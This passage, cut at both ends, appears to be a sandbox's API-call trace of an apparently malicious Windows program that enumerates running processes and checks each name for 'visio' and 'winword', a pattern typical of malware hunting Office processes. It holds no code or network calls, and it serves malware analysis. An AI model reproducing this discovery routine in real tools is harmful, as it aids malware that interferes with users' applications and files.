th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0100.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.321] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357dca8 [0100.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357dca8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0100.321] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0100.321] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="visio") returned 0x0 [0100.321] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0100.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.322] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357dd08 [0100.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357dd08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0100.322] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0100.322] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="visio") returned 0x0 [0100.322] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0100.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.323] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c0e0 [0100.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356c0e0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0100.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0100.323] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="visio") returned 0x0 [0100.323] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.324] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d710 [0100.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356d710, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.324] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.324] StrStrIA (lpFirst="conhost.exe", lpSrch="visio") returned 0x0 [0100.324] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.325] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d5c0 [0100.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356d5c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.325] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.326] StrStrIA (lpFirst="conhost.exe", lpSrch="visio") returned 0x0 [0100.326] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0100.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.327] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356d728 [0100.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356d728, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0100.327] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0100.327] StrStrIA (lpFirst="rxodge.exe", lpSrch="visio") returned 0x0 [0100.327] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.328] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356d740 [0100.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356d740, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0100.328] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0100.328] StrStrIA (lpFirst="sppsvc.exe", lpSrch="visio") returned 0x0 [0100.328] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0100.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.329] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357dd28 [0100.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357dd28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0100.329] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0100.329] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="visio") returned 0x0 [0100.329] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0100.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.330] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d788 [0100.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x356d788, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0100.330] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0100.330] StrStrIA (lpFirst="TiWorker.exe", lpSrch="visio") returned 0x0 [0100.330] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0100.331] CloseHandle (hObject=0x350) returned 1 [0100.331] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0100.346] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.371] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d2a8 [0100.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357d2a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0100.371] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0100.371] StrStrIA (lpFirst="[System Process]", lpSrch="winword") returned 0x0 [0100.371] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0100.372] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574ee0 [0100.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574ee0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0100.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0100.373] StrStrIA (lpFirst="System", lpSrch="winword") returned 0x0 [0100.373] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.374] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356d5d8 [0100.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356d5d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0100.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0100.374] StrStrIA (lpFirst="smss.exe", lpSrch="winword") returned 0x0 [0100.374] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.375] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356d638 [0100.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356d638, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.375] StrStrIA (lpFirst="csrss.exe", lpSrch="winword") returned 0x0 [0100.375] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.376] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d6f8 [0100.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356d6f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0100.376] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0100.376] StrStrIA (lpFirst="wininit.exe", lpSrch="winword") returned 0x0 [0100.377] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.378] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356d650 [0100.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356d650, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.378] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.378] StrStrIA (lpFirst="csrss.exe", lpSrch="winword") returned 0x0 [0100.378] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.379] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d758 [0100.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x356d758, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0100.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0100.379] StrStrIA (lpFirst="winlogon.exe", lpSrch="winword") returned 0x0 [0100.379] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.380] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d4a0 [0100.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356d4a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0100.380] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0100.380] StrStrIA (lpFirst="services.exe", lpSrch="winword") returned 0x0 [0100.380] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.381] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356d680 [0100.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356d680, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0100.381] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0100.382] StrStrIA (lpFirst="lsass.exe", lpSrch="winword") returned 0x0 [0100.382] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.382] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d698 [0100.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d698, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.383] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.383] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.384] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356d6b0 [0100.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356d6b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.384] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.384] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="winword") returned 0x0 [0100.384] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.385] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356d6c8 [0100.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356d6c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.385] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="winword") returned 0x0 [0100.385] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.386] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d4d0 [0100.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d4d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.386] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.386] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.387] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e198 [0100.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e198, cbMultiByte=8, lpDefaultChar=0x0, 